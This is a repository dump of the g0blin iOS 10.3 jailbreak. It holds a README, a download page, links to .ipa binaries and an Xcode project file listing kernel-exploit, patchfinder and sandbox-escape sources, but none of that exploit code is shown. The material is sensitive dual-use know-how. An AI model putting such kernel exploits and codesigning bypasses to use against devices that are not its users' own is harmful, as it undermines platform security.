├── .gitignore ├── README.md ├── docs ├── CNAME ├── files │ ├── g0blin_rc1.ipa │ └── g0blin_rc2.ipa ├── images │ ├── g0blin.png │ └── splash.png └── index.html ├── g0blin.xcodeproj ├── project.pbxproj └── project.xcworkspace │ └── contents.xcworkspacedata └── g0blin ├── 0.reload.plist ├── AppDelegate.h ├── AppDelegate.m ├── Assets.xcassets ├── AppIcon.appiconset │ ├── 3.png │ ├── Contents.json │ ├── Icon-20.png │ ├── Icon-60.png │ ├── Icon-60@3x.png │ ├── Icon-76.png │ ├── Icon-76@2x.png │ ├── Icon-835@2x.png │ ├── Icon-Small-40.png │ ├── Icon-Small-40@2x-1.png │ ├── Icon-Small-40@2x.png │ ├── Icon-Small-40@3x.png │ ├── Icon-Small-41.png │ ├── Icon-Small-42.png │ ├── Icon-Small.png │ ├── Icon-Small@2x-1.png │ ├── Icon-Small@2x.png │ ├── Icon-Small@3x.png │ └── iTunesArtwork@2x.png ├── Contents.json ├── jailbreak-tab.imageset │ ├── Contents.json │ └── jailbreak.pdf ├── logo-lit.imageset │ ├── Contents.json │ ├── logo-lit@2x.png │ └── logo-lit@3x.png └── logo.imageset │ ├── Contents.json │ ├── g0blin@2x.png │ └── g0blin@3x.png ├── BEMSimpleLineGraph ├── BEMAverageLine.h ├── BEMAverageLine.m ├── BEMCircle.h ├── BEMCircle.m ├── BEMLine.h ├── BEMLine.m ├── BEMPermanentPopupView.h ├── BEMPermanentPopupView.m ├── BEMSimpleLineGraphView.h └── BEMSimpleLineGraphView.m ├── Base.lproj ├── LaunchScreen.storyboard └── Main.storyboard ├── Info.plist ├── SettingsController.h ├── SettingsController.m ├── ViewController.h ├── ViewController.m ├── bootstrap.h ├── bootstrap.m ├── bootstrap.tar ├── common.h ├── kernel.h ├── kernel.m ├── launchctl ├── main.m ├── offsets.h ├── offsets.m ├── patchfinder64.c ├── patchfinder64.h ├── pte_stuff.h ├── reload ├── remount.h ├── remount.m ├── sbops.h ├── tar ├── unjail.h ├── unjail.m ├── v0rtex.h ├── v0rtex.m └── y0nkers.m4v /.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store 2 | xcuserdata 3 | bootstrap/ 4 | _Materials/ 5 | _Releases/ 6 | tests/ 7 | _Research/ 8 | 9 | g0blin/Info-with-alt-icons.plist 10 | g0blin/ViewController-with-reboot.m 11 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # g0blin 2 | 3 | A work-in-progress iOS 10.3.x jailbreak for 64-bit iDevices (A7 - A9) made from off the shelf parts and shared research. 4 | Long live jailbreaking! 5 | 6 | 7 | ## supported devices 8 | 9 | iPod 6G 10 | iPhone 5S, 6, 6+, 6S, 6S+, SE 11 | iPad Air, Air 2, 5G (2017), Pro 1G 9.7", Pro 1G 12.9", Mini 2, Mini 3, Mini 4 12 | 13 | 14 | ## what doesn't work yet? 15 | 16 | There are a few things not working that are related to a kernel patching issue: 17 | - Touch ID not working in containerized Apps 18 | - Preferences behaving badly in containerized Apps 19 | - Failure to launch an App via Xcode 20 | 21 | 22 | ## what does work? 23 | 24 | Everything else? 25 | 26 | 27 | ## instructions 28 | 29 | 1) Download an offical .ipa file from [g0blin.sticktron.net](http://g0blin.sticktron.net) 30 | 31 | 2) Install using [Cydia Impactor](http://www.cydiaimpactor.com) 32 | 33 | 34 | ## tips 35 | 36 | - if the Cydia icon is hidden you can fix it by adding a new key `SBShowNonDefaultApps` and binary value `YES` to `/User/Library/Preferences/com.apple.springboard.plist` using Filza 37 | - A temporary workaround for TouchID is to turn it off before jailbreaking and then turn it back on afterward 38 | 39 | 40 | ## a note about dropbear 41 | 42 | I decided to make installing an SSH server optional for safety reasons, so g0blin RC2 automatically uninstalls dropbear when it runs. Post-RC2 builds no longer do that. 43 | 44 | I recommend installing OpenSSH instead. The port will be `22` by default. It can be changed in `/etc/services`. 45 | 46 | 47 | ## ingredients 48 | 49 | + [v0rtex](http://github.com/siguza/v0rtex) kernel exploit by Siguza, vuln by Ian Beer, POC by windknown 50 | + kpp bypass, sandbox, codesigning from [yalu102](http://github.com/kpwn/yalu102) by Luca Todesco 51 | + additional sandbox work from [h3lix](http://h3lix.tihmstar.net) by tihmstar 52 | + patchfinder from [extra_recipe](http://github.com/xerub/extra_recipe) by Xerub 53 | + additional patchfinder work from [async_wake_fun](http://github.com/ninjaprawn/async_wake-fun) by ninjaprawn 54 | + Cydia by Jay Freeman (saurik) 55 | 56 | 57 | ## shoutouts 58 | 59 | Siguza, Ian Beer, windknown, Luca Todesco, xerub, tihmstar, saurik, uroboro, cheesecakeufo, arx8x, psycho tea, cryptic; Tyler, the Creator, randomblackdude; Mom. 60 | 61 | I am extremely grateful for everyone whose open-source/public contributions to iOS research and developement made this software possible :) 62 | 63 | 64 |   65 |   66 | 67 | 68 |

69 | 70 | 71 |

😈

72 | -------------------------------------------------------------------------------- /docs/CNAME: -------------------------------------------------------------------------------- 1 | g0blin.sticktron.net -------------------------------------------------------------------------------- /docs/files/g0blin_rc1.ipa: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Sticktron/g0blin/83a6c944eac827f93d84aeb4d61afdf204ac5446/docs/files/g0blin_rc1.ipa -------------------------------------------------------------------------------- /docs/files/g0blin_rc2.ipa: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Sticktron/g0blin/83a6c944eac827f93d84aeb4d61afdf204ac5446/docs/files/g0blin_rc2.ipa -------------------------------------------------------------------------------- /docs/images/g0blin.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Sticktron/g0blin/83a6c944eac827f93d84aeb4d61afdf204ac5446/docs/images/g0blin.png -------------------------------------------------------------------------------- /docs/images/splash.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Sticktron/g0blin/83a6c944eac827f93d84aeb4d61afdf204ac5446/docs/images/splash.png -------------------------------------------------------------------------------- /docs/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | g0blin jailbreak 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 93 | 94 | 95 | 96 | 103 | 104 | 105 | 106 |
107 | g0blin jailbreak 108 |

wip jailbreak for iOS 10.3 - 10.3.3

109 |
110 | 111 |
112 |

supported devices:

113 | supported devices 114 |
115 | 116 |
117 |

download:

118 |
119 |

g0blin RC2 official

120 |

SHA1: 36ce699095441f0bc2533b4d021b4c46807b4706

121 |
122 |

g0blin RC1 official

123 |

SHA1: b370789e866f0125a66dbc48ef24f4ca00ed9b0b

124 |
125 |

install with Cydia Impactor

126 |
127 | 128 |
129 |

changelog:

130 |
131 |

132 | release candidate 2
133 |
134 | - fix respring panic
135 | - uninstalls dropbear, you can install OpenSSH instead
136 | - fix Cydia icon not always appearing
137 | - supports more device/OS version combos
138 |

139 |
140 |

141 | release candidate 1
142 |
143 | - fixed bad sandbox patch
144 |

145 |
146 | 147 |
148 |

known issues:

149 |

• Touch ID stops working in third-party apps while jailbroken

150 |

issue tracker

151 |
152 | 153 |
154 |

credits:

155 |

v0rtex kernel exploit by Siguza, vuln by Ian Beer, POC by windknown

156 |

kpp bypass, amfi, sandbox, kernel patches from yalu102 by qwertyoruiop

157 |

additional sandbox patch from h3lix by tihmstar

158 |

patchfinder from extra_recipe by xerub

159 |

offsetfinder scripts by uroboro

160 |

Cydia by Jay Freeman (saurik)

161 |
162 | 163 | 174 | 175 |
176 |

This is (and always will be) free software. I love you all. Enjoy!

177 |
178 | 179 | 183 | 184 | 185 | 186 | 187 | 188 | 189 | 190 | -------------------------------------------------------------------------------- /g0blin.xcodeproj/project.pbxproj: -------------------------------------------------------------------------------- 1 | // !$*UTF8*$! 2 | { 3 | archiveVersion = 1; 4 | classes = { 5 | }; 6 | objectVersion = 48; 7 | objects = { 8 | 9 | /* Begin PBXBuildFile section */ 10 | EE0A1C281FF8891A001030DB /* SettingsController.m in Sources */ = {isa = PBXBuildFile; fileRef = EE0A1C271FF8891A001030DB /* SettingsController.m */; }; 11 | EE1C60E41FFACA3600D30AAC /* bootstrap.tar in Resources */ = {isa = PBXBuildFile; fileRef = EE1C60E31FFACA3500D30AAC /* bootstrap.tar */; }; 12 | EE62D30F202E0A7800749002 /* BEMLine.m in Sources */ = {isa = PBXBuildFile; fileRef = EE62D305202E043000749002 /* BEMLine.m */; }; 13 | EE62D310202E0A7800749002 /* BEMAverageLine.m in Sources */ = {isa = PBXBuildFile; fileRef = EE62D309202E043000749002 /* BEMAverageLine.m */; }; 14 | EE62D311202E0A7800749002 /* BEMPermanentPopupView.m in Sources */ = {isa = PBXBuildFile; fileRef = EE62D30B202E043000749002 /* BEMPermanentPopupView.m */; }; 15 | EE62D312202E0A7800749002 /* BEMCircle.m in Sources */ = {isa = PBXBuildFile; fileRef = EE62D30C202E043000749002 /* BEMCircle.m */; }; 16 | EE62D313202E0A7800749002 /* BEMSimpleLineGraphView.m in Sources */ = {isa = PBXBuildFile; fileRef = EE62D30D202E043000749002 /* BEMSimpleLineGraphView.m */; }; 17 | EE9402401FF33CAE00C9325F /* AppDelegate.m in Sources */ = {isa = PBXBuildFile; fileRef = EE94023F1FF33CAE00C9325F /* AppDelegate.m */; }; 18 | EE9402431FF33CAE00C9325F /* ViewController.m in Sources */ = {isa = PBXBuildFile; fileRef = EE9402421FF33CAE00C9325F /* ViewController.m */; }; 19 | EE9402461FF33CAE00C9325F /* Main.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = EE9402441FF33CAE00C9325F /* Main.storyboard */; }; 20 | EE9402481FF33CAE00C9325F /* Assets.xcassets in Resources */ = {isa = PBXBuildFile; fileRef = EE9402471FF33CAE00C9325F /* Assets.xcassets */; }; 21 | EE94024B1FF33CAE00C9325F /* LaunchScreen.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = EE9402491FF33CAE00C9325F /* LaunchScreen.storyboard */; }; 22 | EE94024E1FF33CAE00C9325F /* main.m in Sources */ = {isa = PBXBuildFile; fileRef = EE94024D1FF33CAE00C9325F /* main.m */; }; 23 | EE9402581FF3404700C9325F /* v0rtex.m in Sources */ = {isa = PBXBuildFile; fileRef = EE9402561FF33CF000C9325F /* v0rtex.m */; }; 24 | EE94025B1FF340D400C9325F /* offsets.m in Sources */ = {isa = PBXBuildFile; fileRef = EE94025A1FF340D400C9325F /* offsets.m */; }; 25 | EE94025E1FF3453200C9325F /* IOKit.framework in Frameworks */ = {isa = PBXBuildFile; fileRef = EE94025D1FF3453200C9325F /* IOKit.framework */; }; 26 | EE9402621FF375E700C9325F /* unjail.m in Sources */ = {isa = PBXBuildFile; fileRef = EE9402611FF375E600C9325F /* unjail.m */; }; 27 | EE9402651FF3766500C9325F /* patchfinder64.c in Sources */ = {isa = PBXBuildFile; fileRef = EE9402641FF3766500C9325F /* patchfinder64.c */; }; 28 | EE9402681FF376E400C9325F /* kernel.m in Sources */ = {isa = PBXBuildFile; fileRef = EE9402661FF376E400C9325F /* kernel.m */; }; 29 | EE9828C01FF3E2C50085B633 /* remount.m in Sources */ = {isa = PBXBuildFile; fileRef = EE9828BE1FF3E2C40085B633 /* remount.m */; }; 30 | EE9828C31FF3E9AA0085B633 /* bootstrap.m in Sources */ = {isa = PBXBuildFile; fileRef = EE9828C21FF3E9AA0085B633 /* bootstrap.m */; }; 31 | EE9828C81FF418800085B633 /* tar in Resources */ = {isa = PBXBuildFile; fileRef = EE9828C41FF4187F0085B633 /* tar */; }; 32 | EE9C13042034A3E500C25AAC /* launchctl in Resources */ = {isa = PBXBuildFile; fileRef = EE9828C61FF4187F0085B633 /* launchctl */; }; 33 | EEC032D6201EDF8A00E70E6E /* y0nkers.m4v in Resources */ = {isa = PBXBuildFile; fileRef = EE95FECF201EA10B00D5377E /* y0nkers.m4v */; }; 34 | /* End PBXBuildFile section */ 35 | 36 | /* Begin PBXFileReference section */ 37 | EE0A1C261FF8891A001030DB /* SettingsController.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = SettingsController.h; sourceTree = ""; }; 38 | EE0A1C271FF8891A001030DB /* SettingsController.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = SettingsController.m; sourceTree = ""; }; 39 | EE1C60E31FFACA3500D30AAC /* bootstrap.tar */ = {isa = PBXFileReference; lastKnownFileType = archive.tar; path = bootstrap.tar; sourceTree = ""; }; 40 | EE62D305202E043000749002 /* BEMLine.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = BEMLine.m; sourceTree = ""; }; 41 | EE62D306202E043000749002 /* BEMCircle.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = BEMCircle.h; sourceTree = ""; }; 42 | EE62D307202E043000749002 /* BEMSimpleLineGraphView.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = BEMSimpleLineGraphView.h; sourceTree = ""; }; 43 | EE62D308202E043000749002 /* BEMPermanentPopupView.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = BEMPermanentPopupView.h; sourceTree = ""; }; 44 | EE62D309202E043000749002 /* BEMAverageLine.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = BEMAverageLine.m; sourceTree = ""; }; 45 | EE62D30A202E043000749002 /* BEMLine.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = BEMLine.h; sourceTree = ""; }; 46 | EE62D30B202E043000749002 /* BEMPermanentPopupView.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = BEMPermanentPopupView.m; sourceTree = ""; }; 47 | EE62D30C202E043000749002 /* BEMCircle.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = BEMCircle.m; sourceTree = ""; }; 48 | EE62D30D202E043000749002 /* BEMSimpleLineGraphView.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = BEMSimpleLineGraphView.m; sourceTree = ""; }; 49 | EE62D30E202E043000749002 /* BEMAverageLine.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = BEMAverageLine.h; sourceTree = ""; }; 50 | EE94023B1FF33CAE00C9325F /* g0blin.app */ = {isa = PBXFileReference; explicitFileType = wrapper.application; includeInIndex = 0; path = g0blin.app; sourceTree = BUILT_PRODUCTS_DIR; }; 51 | EE94023E1FF33CAE00C9325F /* AppDelegate.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = AppDelegate.h; sourceTree = ""; }; 52 | EE94023F1FF33CAE00C9325F /* AppDelegate.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = AppDelegate.m; sourceTree = ""; }; 53 | EE9402411FF33CAE00C9325F /* ViewController.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = ViewController.h; sourceTree = ""; }; 54 | EE9402421FF33CAE00C9325F /* ViewController.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = ViewController.m; sourceTree = ""; }; 55 | EE9402451FF33CAE00C9325F /* Base */ = {isa = PBXFileReference; lastKnownFileType = file.storyboard; name = Base; path = Base.lproj/Main.storyboard; sourceTree = ""; }; 56 | EE9402471FF33CAE00C9325F /* Assets.xcassets */ = {isa = PBXFileReference; lastKnownFileType = folder.assetcatalog; path = Assets.xcassets; sourceTree = ""; }; 57 | EE94024A1FF33CAE00C9325F /* Base */ = {isa = PBXFileReference; lastKnownFileType = file.storyboard; name = Base; path = Base.lproj/LaunchScreen.storyboard; sourceTree = ""; }; 58 | EE94024C1FF33CAE00C9325F /* Info.plist */ = {isa = PBXFileReference; lastKnownFileType = text.plist.xml; path = Info.plist; sourceTree = ""; }; 59 | EE94024D1FF33CAE00C9325F /* main.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = main.m; sourceTree = ""; }; 60 | EE9402551FF33CF000C9325F /* v0rtex.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = v0rtex.h; sourceTree = ""; }; 61 | EE9402561FF33CF000C9325F /* v0rtex.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = v0rtex.m; sourceTree = ""; }; 62 | EE9402571FF33CF000C9325F /* common.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = common.h; sourceTree = ""; }; 63 | EE9402591FF340D400C9325F /* offsets.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = offsets.h; sourceTree = ""; }; 64 | EE94025A1FF340D400C9325F /* offsets.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = offsets.m; sourceTree = ""; }; 65 | EE94025D1FF3453200C9325F /* IOKit.framework */ = {isa = PBXFileReference; lastKnownFileType = wrapper.framework; name = IOKit.framework; path = ../../../../System/Library/Frameworks/IOKit.framework; sourceTree = ""; }; 66 | EE94025F1FF375E600C9325F /* unjail.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = unjail.h; sourceTree = ""; }; 67 | EE9402601FF375E600C9325F /* pte_stuff.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = pte_stuff.h; sourceTree = ""; }; 68 | EE9402611FF375E600C9325F /* unjail.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = unjail.m; sourceTree = ""; }; 69 | EE9402631FF3766500C9325F /* patchfinder64.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = patchfinder64.h; sourceTree = ""; }; 70 | EE9402641FF3766500C9325F /* patchfinder64.c */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.c; path = patchfinder64.c; sourceTree = ""; }; 71 | EE9402661FF376E400C9325F /* kernel.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = kernel.m; sourceTree = ""; }; 72 | EE9402671FF376E400C9325F /* kernel.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = kernel.h; sourceTree = ""; }; 73 | EE95FECF201EA10B00D5377E /* y0nkers.m4v */ = {isa = PBXFileReference; lastKnownFileType = file; path = y0nkers.m4v; sourceTree = ""; }; 74 | EE9828BE1FF3E2C40085B633 /* remount.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = remount.m; sourceTree = ""; }; 75 | EE9828BF1FF3E2C40085B633 /* remount.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = remount.h; sourceTree = ""; }; 76 | EE9828C11FF3E9AA0085B633 /* bootstrap.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = bootstrap.h; sourceTree = ""; }; 77 | EE9828C21FF3E9AA0085B633 /* bootstrap.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = bootstrap.m; sourceTree = ""; }; 78 | EE9828C41FF4187F0085B633 /* tar */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.executable"; path = tar; sourceTree = ""; }; 79 | EE9828C61FF4187F0085B633 /* launchctl */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.executable"; path = launchctl; sourceTree = ""; }; 80 | EE9DD8C8201E6D1000CE61E8 /* reload */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = text.script.sh; path = reload; sourceTree = ""; }; 81 | EE9DD8C9201E6D1000CE61E8 /* 0.reload.plist */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = text.plist.xml; path = 0.reload.plist; sourceTree = ""; }; 82 | EECBF75E2020DA370078A0D8 /* sbops.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = sbops.h; sourceTree = ""; }; 83 | /* End PBXFileReference section */ 84 | 85 | /* Begin PBXFrameworksBuildPhase section */ 86 | EE9402381FF33CAE00C9325F /* Frameworks */ = { 87 | isa = PBXFrameworksBuildPhase; 88 | buildActionMask = 2147483647; 89 | files = ( 90 | EE94025E1FF3453200C9325F /* IOKit.framework in Frameworks */, 91 | ); 92 | runOnlyForDeploymentPostprocessing = 0; 93 | }; 94 | /* End PBXFrameworksBuildPhase section */ 95 | 96 | /* Begin PBXGroup section */ 97 | EE2154D0201C0B37008D3D93 /* Supporting Files */ = { 98 | isa = PBXGroup; 99 | children = ( 100 | EE94024C1FF33CAE00C9325F /* Info.plist */, 101 | EE9402471FF33CAE00C9325F /* Assets.xcassets */, 102 | EE9402491FF33CAE00C9325F /* LaunchScreen.storyboard */, 103 | EE9402441FF33CAE00C9325F /* Main.storyboard */, 104 | ); 105 | name = "Supporting Files"; 106 | sourceTree = ""; 107 | }; 108 | EE62D304202E043000749002 /* BEMSimpleLineGraph */ = { 109 | isa = PBXGroup; 110 | children = ( 111 | EE62D305202E043000749002 /* BEMLine.m */, 112 | EE62D306202E043000749002 /* BEMCircle.h */, 113 | EE62D307202E043000749002 /* BEMSimpleLineGraphView.h */, 114 | EE62D308202E043000749002 /* BEMPermanentPopupView.h */, 115 | EE62D309202E043000749002 /* BEMAverageLine.m */, 116 | EE62D30A202E043000749002 /* BEMLine.h */, 117 | EE62D30B202E043000749002 /* BEMPermanentPopupView.m */, 118 | EE62D30C202E043000749002 /* BEMCircle.m */, 119 | EE62D30D202E043000749002 /* BEMSimpleLineGraphView.m */, 120 | EE62D30E202E043000749002 /* BEMAverageLine.h */, 121 | ); 122 | path = BEMSimpleLineGraph; 123 | sourceTree = ""; 124 | }; 125 | EE9402321FF33CAE00C9325F = { 126 | isa = PBXGroup; 127 | children = ( 128 | EE94023D1FF33CAE00C9325F /* g0blin */, 129 | EE94023C1FF33CAE00C9325F /* Products */, 130 | EE94025C1FF3453200C9325F /* Frameworks */, 131 | ); 132 | sourceTree = ""; 133 | }; 134 | EE94023C1FF33CAE00C9325F /* Products */ = { 135 | isa = PBXGroup; 136 | children = ( 137 | EE94023B1FF33CAE00C9325F /* g0blin.app */, 138 | ); 139 | name = Products; 140 | sourceTree = ""; 141 | }; 142 | EE94023D1FF33CAE00C9325F /* g0blin */ = { 143 | isa = PBXGroup; 144 | children = ( 145 | EEA7165C201E6C810095F172 /* App */, 146 | EEA7165D201E6C970095F172 /* Jailbreak */, 147 | EE9828CC1FF4188B0085B633 /* Payload */, 148 | EE2154D0201C0B37008D3D93 /* Supporting Files */, 149 | ); 150 | path = g0blin; 151 | sourceTree = ""; 152 | }; 153 | EE94025C1FF3453200C9325F /* Frameworks */ = { 154 | isa = PBXGroup; 155 | children = ( 156 | EE94025D1FF3453200C9325F /* IOKit.framework */, 157 | ); 158 | name = Frameworks; 159 | sourceTree = ""; 160 | }; 161 | EE9828CC1FF4188B0085B633 /* Payload */ = { 162 | isa = PBXGroup; 163 | children = ( 164 | EE9DD8C9201E6D1000CE61E8 /* 0.reload.plist */, 165 | EE1C60E31FFACA3500D30AAC /* bootstrap.tar */, 166 | EE9828C61FF4187F0085B633 /* launchctl */, 167 | EE9DD8C8201E6D1000CE61E8 /* reload */, 168 | EE9828C41FF4187F0085B633 /* tar */, 169 | EE95FECF201EA10B00D5377E /* y0nkers.m4v */, 170 | ); 171 | name = Payload; 172 | sourceTree = ""; 173 | }; 174 | EEA7165C201E6C810095F172 /* App */ = { 175 | isa = PBXGroup; 176 | children = ( 177 | EE62D304202E043000749002 /* BEMSimpleLineGraph */, 178 | EE94023E1FF33CAE00C9325F /* AppDelegate.h */, 179 | EE94023F1FF33CAE00C9325F /* AppDelegate.m */, 180 | EE94024D1FF33CAE00C9325F /* main.m */, 181 | EE0A1C261FF8891A001030DB /* SettingsController.h */, 182 | EE0A1C271FF8891A001030DB /* SettingsController.m */, 183 | EE9402411FF33CAE00C9325F /* ViewController.h */, 184 | EE9402421FF33CAE00C9325F /* ViewController.m */, 185 | ); 186 | name = App; 187 | sourceTree = ""; 188 | }; 189 | EEA7165D201E6C970095F172 /* Jailbreak */ = { 190 | isa = PBXGroup; 191 | children = ( 192 | EE9828C11FF3E9AA0085B633 /* bootstrap.h */, 193 | EE9828C21FF3E9AA0085B633 /* bootstrap.m */, 194 | EE9402571FF33CF000C9325F /* common.h */, 195 | EE9402671FF376E400C9325F /* kernel.h */, 196 | EE9402661FF376E400C9325F /* kernel.m */, 197 | EE94025F1FF375E600C9325F /* unjail.h */, 198 | EE9402611FF375E600C9325F /* unjail.m */, 199 | EE9402591FF340D400C9325F /* offsets.h */, 200 | EE94025A1FF340D400C9325F /* offsets.m */, 201 | EE9402641FF3766500C9325F /* patchfinder64.c */, 202 | EE9402631FF3766500C9325F /* patchfinder64.h */, 203 | EE9402601FF375E600C9325F /* pte_stuff.h */, 204 | EE9828BF1FF3E2C40085B633 /* remount.h */, 205 | EE9828BE1FF3E2C40085B633 /* remount.m */, 206 | EECBF75E2020DA370078A0D8 /* sbops.h */, 207 | EE9402551FF33CF000C9325F /* v0rtex.h */, 208 | EE9402561FF33CF000C9325F /* v0rtex.m */, 209 | ); 210 | name = Jailbreak; 211 | sourceTree = ""; 212 | }; 213 | /* End PBXGroup section */ 214 | 215 | /* Begin PBXNativeTarget section */ 216 | EE94023A1FF33CAE00C9325F /* g0blin */ = { 217 | isa = PBXNativeTarget; 218 | buildConfigurationList = EE9402511FF33CAE00C9325F /* Build configuration list for PBXNativeTarget "g0blin" */; 219 | buildPhases = ( 220 | EE9402371FF33CAE00C9325F /* Sources */, 221 | EE9402381FF33CAE00C9325F /* Frameworks */, 222 | EE9402391FF33CAE00C9325F /* Resources */, 223 | ); 224 | buildRules = ( 225 | ); 226 | dependencies = ( 227 | ); 228 | name = g0blin; 229 | productName = g0blin; 230 | productReference = EE94023B1FF33CAE00C9325F /* g0blin.app */; 231 | productType = "com.apple.product-type.application"; 232 | }; 233 | /* End PBXNativeTarget section */ 234 | 235 | /* Begin PBXProject section */ 236 | EE9402331FF33CAE00C9325F /* Project object */ = { 237 | isa = PBXProject; 238 | attributes = { 239 | LastUpgradeCheck = 0900; 240 | ORGANIZATIONNAME = Sticktron; 241 | TargetAttributes = { 242 | EE94023A1FF33CAE00C9325F = { 243 | CreatedOnToolsVersion = 9.0; 244 | ProvisioningStyle = Automatic; 245 | }; 246 | }; 247 | }; 248 | buildConfigurationList = EE9402361FF33CAE00C9325F /* Build configuration list for PBXProject "g0blin" */; 249 | compatibilityVersion = "Xcode 8.0"; 250 | developmentRegion = en; 251 | hasScannedForEncodings = 0; 252 | knownRegions = ( 253 | en, 254 | Base, 255 | ); 256 | mainGroup = EE9402321FF33CAE00C9325F; 257 | productRefGroup = EE94023C1FF33CAE00C9325F /* Products */; 258 | projectDirPath = ""; 259 | projectRoot = ""; 260 | targets = ( 261 | EE94023A1FF33CAE00C9325F /* g0blin */, 262 | ); 263 | }; 264 | /* End PBXProject section */ 265 | 266 | /* Begin PBXResourcesBuildPhase section */ 267 | EE9402391FF33CAE00C9325F /* Resources */ = { 268 | isa = PBXResourcesBuildPhase; 269 | buildActionMask = 2147483647; 270 | files = ( 271 | EE9C13042034A3E500C25AAC /* launchctl in Resources */, 272 | EEC032D6201EDF8A00E70E6E /* y0nkers.m4v in Resources */, 273 | EE1C60E41FFACA3600D30AAC /* bootstrap.tar in Resources */, 274 | EE9828C81FF418800085B633 /* tar in Resources */, 275 | EE94024B1FF33CAE00C9325F /* LaunchScreen.storyboard in Resources */, 276 | EE9402481FF33CAE00C9325F /* Assets.xcassets in Resources */, 277 | EE9402461FF33CAE00C9325F /* Main.storyboard in Resources */, 278 | ); 279 | runOnlyForDeploymentPostprocessing = 0; 280 | }; 281 | /* End PBXResourcesBuildPhase section */ 282 | 283 | /* Begin PBXSourcesBuildPhase section */ 284 | EE9402371FF33CAE00C9325F /* Sources */ = { 285 | isa = PBXSourcesBuildPhase; 286 | buildActionMask = 2147483647; 287 | files = ( 288 | EE62D30F202E0A7800749002 /* BEMLine.m in Sources */, 289 | EE62D310202E0A7800749002 /* BEMAverageLine.m in Sources */, 290 | EE62D311202E0A7800749002 /* BEMPermanentPopupView.m in Sources */, 291 | EE62D312202E0A7800749002 /* BEMCircle.m in Sources */, 292 | EE62D313202E0A7800749002 /* BEMSimpleLineGraphView.m in Sources */, 293 | EE94024E1FF33CAE00C9325F /* main.m in Sources */, 294 | EE9402401FF33CAE00C9325F /* AppDelegate.m in Sources */, 295 | EE9402431FF33CAE00C9325F /* ViewController.m in Sources */, 296 | EE94025B1FF340D400C9325F /* offsets.m in Sources */, 297 | EE9402581FF3404700C9325F /* v0rtex.m in Sources */, 298 | EE9402651FF3766500C9325F /* patchfinder64.c in Sources */, 299 | EE9402681FF376E400C9325F /* kernel.m in Sources */, 300 | EE9402621FF375E700C9325F /* unjail.m in Sources */, 301 | EE9828C01FF3E2C50085B633 /* remount.m in Sources */, 302 | EE9828C31FF3E9AA0085B633 /* bootstrap.m in Sources */, 303 | EE0A1C281FF8891A001030DB /* SettingsController.m in Sources */, 304 | ); 305 | runOnlyForDeploymentPostprocessing = 0; 306 | }; 307 | /* End PBXSourcesBuildPhase section */ 308 | 309 | /* Begin PBXVariantGroup section */ 310 | EE9402441FF33CAE00C9325F /* Main.storyboard */ = { 311 | isa = PBXVariantGroup; 312 | children = ( 313 | EE9402451FF33CAE00C9325F /* Base */, 314 | ); 315 | name = Main.storyboard; 316 | sourceTree = ""; 317 | }; 318 | EE9402491FF33CAE00C9325F /* LaunchScreen.storyboard */ = { 319 | isa = PBXVariantGroup; 320 | children = ( 321 | EE94024A1FF33CAE00C9325F /* Base */, 322 | ); 323 | name = LaunchScreen.storyboard; 324 | sourceTree = ""; 325 | }; 326 | /* End PBXVariantGroup section */ 327 | 328 | /* Begin XCBuildConfiguration section */ 329 | EE94024F1FF33CAE00C9325F /* Debug */ = { 330 | isa = XCBuildConfiguration; 331 | buildSettings = { 332 | ALWAYS_SEARCH_USER_PATHS = NO; 333 | 